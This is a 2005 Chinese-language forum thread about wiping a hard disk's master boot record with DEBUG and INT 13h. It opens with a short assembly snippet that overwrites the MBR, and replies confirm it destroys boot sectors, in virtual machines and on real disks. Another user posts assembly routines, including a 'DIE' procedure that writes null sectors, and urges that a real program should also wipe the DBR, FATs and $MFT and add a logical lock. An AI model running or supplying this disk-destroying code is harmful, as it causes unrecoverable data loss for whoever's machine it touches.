标题: 破坏硬盘主引导扇区(不知道在哪里找的,这个应该不错 ) [打印本页]
作者: bagpipe 时间: 2005-11-15 09:04 标题: 破坏硬盘主引导扇区(不知道在哪里找的,这个应该不错 )
方法是运行debug,然后输入:
a 100
mov ax,301
mov bx,1000
mov cx,1
mov dx,80
int 13
g=100 10e
不知道这段代码灵不灵,偶没敢试验,偶怕,偶胆小,偶 ... ...希望有胆量的兄弟试验完告诉我下结果就OK了,偶这里先谢过了,不过上面的代码如果真的有这么厉害的话,还请各位不要在别人的机器上瞎试验!
作者: 220110 时间: 2005-11-15 18:54
我在虚拟机试的效果:
附件 1:debug.gif (2005-11-17 11:03, 3.42 K, 下载附件所需积分 1点 ,下载次数: 6)
作者: JonePeng 时间: 2005-11-15 19:37
2楼的兄弟,最后一行的指令不是这样执行的。应该在图上的那 320C:010E 一处直接按回车,使它返回“-”的状态,然后再运行那条指令。
作者: 220110 时间: 2005-11-15 21:31
的确有问题出现!
我按小JONG指正,用超级DOS71试了下,跟着整个虚拟机自动关掉。
现在再试试把FREEDOS安装到虚拟硬盘试试。
作者: 220110 时间: 2005-11-15 22:23
结果一句话:呵呵呵呵……
作者: skiyfile 时间: 2005-11-16 17:48
强人,不敢试,因为不会修复,所以不敢试.
作者: JonePeng 时间: 2005-11-16 21:11
汗 |||
又一个破坏硬盘的炸弹?!
作者: 220110 时间: 2005-11-16 22:16
有这个命令,不知能不能修复的呢?
附件 1:
作者: bagpipe 时间: 2005-11-17 09:11
兄弟们,我靠,真把硬盘引导扇区给干掉了,不妙,不妙啊,220110 &JonePeng
兄加我下,OK?
作者: 不得不爱 时间: 2005-11-17 10:57
黑白图象就不要用JPG文件发附件嘛,浪费空间嘛!我帮你改为GIF文件!
作者: 220110 时间: 2005-11-17 17:34
====================220110声明====================
本人在此所有贴子,完全出于对技术的追求,和大家共同学习,并对道德等等方
面的一切不以考虑——本人不想戴着枷锁跳舞,如被某某所采用以致的一切后果,
本人概不负责!
====================220110声明====================
以下引用自《硬盘保护技术手册》:
INT 13H用法:
BIOS 13H中断调用,功能02H----将一个或多个扇区读到缓冲区
输入: AH=02H
AL=要读取的扇区数目
BX=缓冲区的位址偏移量
CH=磁道号码
CL=扇区号码
DH=磁头号码
DL=驱动器号码
ES=缓冲区分段地址
(ES:BX=缓冲区地址)
输出:进位标志=0:读取成功(AH=0)
进位标志=1:错误发生(AH=显示误码)
;读取硬盘的MBR扇区(0201h !)
-A 100 ;表示由100H开始输入程序
mov ax,0201h ;设为读取第一扇区
mov bx,0200h ;读入到0200H首地址
mov cx,0001h ;读取CYLINDER 0 SECTOR 1
mov dx,0080h ;HEAD 0 DRIVE 80H
int 13
-G ;执行程序
;写入硬盘的MBR扇区(0301h !)
mov ax,0301h
mov bx,0200h
mov cx,0001h
mov dx,0080h
int 13
[ Last edited by 220110 on 2005-11-17 at 17:35 ]
作者: 220110 时间: 2005-11-17 17:37
| Quote: | |
|
谢谢qwe1234567,我还真不是很了解各种扩展名的图片格式呢。 :>得再学习……
作者: darkradx 时间: 2005-11-17 17:50
_EINT13_WRITE PROC NEAR
PUSH BP
MOV BP,SP
PUSH CX
PUSH SI
XOR SI,SI
PUSH SI
PUSH SI
PUSH DX
PUSH AX
PUSH ES
PUSH BX
PUSH AX
MOV AX,CX
MOV CX,0008h
SHR AX,CL
AND AX,003Fh
MOV CX,AX
POP AX
PUSH CX
MOV SI,0010h
PUSH SI
MOV SI,SP
PUSH AX
PUSH DX
MOV AX,4300h
MOV DX,[BP-0002h]
XOR DH,DH
INT 13h
POP DX
POP AX
MOV SI,[BP-0004h]
MOV CX,[BP-0002h]
MOV SP,BP
POP BP
RETN
_EINT13_WRITE ENDP
作者: darkradx 时间: 2005-11-17 17:53
DIE PROC NEAR
PUSH BX
PUSH CX
MOV BX,OFFSET _null_sectors
MOV CX,3F80h
;CALL _EINT13_READ ;DEBUG
CALL _EINT13_WRITE
POP CX
POP BX
RETN
DIE ENDP
作者: darkradx 时间: 2005-11-17 17:57
破壞MBR很好修復,推薦PTD,
JMFIX,PR都太弱了......
但是若自己要寫程序,
一定要MBR,DBR,FAT1,FAT2,$MFT,$MFTMirr全干掉,
而且順便來個邏輯鎖才行啊,
否則都沒臉拿出去見人
當然,程序跨越不了8.4G也不用拿出來了
[ Last edited by darkradx on 2005-11-17 at 17:59 ]
作者: scandisk 时间: 2005-12-20 11:47
涨见识了,强人
作者: 人类 时间: 2005-12-21 01:36
我的MBR是我自己写的,目前active不能跨越8.4G
正在看xp建立的MBR,它用到了扩展后的中断
作者: fdsiuha 时间: 2005-12-21 22:50
又不能传染,何苦...
L 0100 2 0 1
把MBR读到0100然后随便E
最后W回去
连记中断都省了-_-
或者U 0100把跳转一改到自己写的程序,INT10彪几句牛话,再跳回来,也还行,就是被杀毒软件干掉...
我还在研究别人的MBR...
[ Last edited by fdsiuha on 2005-12-21 at 22:56 ]
作者: darkradx 时间: 2005-12-22 08:31
不要把硬盤當軟盤
作者: 220110 时间: 2005-12-22 20:10
很久前曾经DEBUG坏两个硬盘,数个月过去了还在阴影中.... 现在只敢在虚拟机上玩。
到现在也不知坏在哪了,反正一接上硬盘,就不给CDROM/软盘/U盘启动,无法访问和低格。
fixmbr 与 fdisk /mbr 相同不?它们是重写了,还是只修正哪个偏移地址的值?
作者: fdsiuha 时间: 2005-12-22 22:16
| Quote: | |
|
我好长时间没有用软盘了,只有一张WIN98启动光盘,所以只能在我的唯一的硬盘上试MBR了,挺危险的,但是只要备分了分区表就没有问题。
但是忘记说了,WIN下DEBUG不是万能的,需要在DOS7.1下写磁盘...
------------------------
更正:DEBUG中的-L 0100 2 0 1实际写的是硬盘中的“C:”盘分区上的DOS BOOT区,不是MBR,2 0 1中的2是指启动分区...不是物理的硬盘。时间长了我自己都忘了。前几天U了几句发现不对,D下去一看没有分区表,纳闷,突然想起原来曾经犯同样的错误...谢谢darkradx的指正!
[ Last edited by fdsiuha on 2005-12-26 at 20:34 ]
作者: kong 时间: 2005-12-24 10:53
hao a
作者: lvkang 时间: 2005-12-27 13:08
牛人!!!!!!!
作者: lfdjssz 时间: 2006-1-2 06:51
不错,长见识了,前来学习学习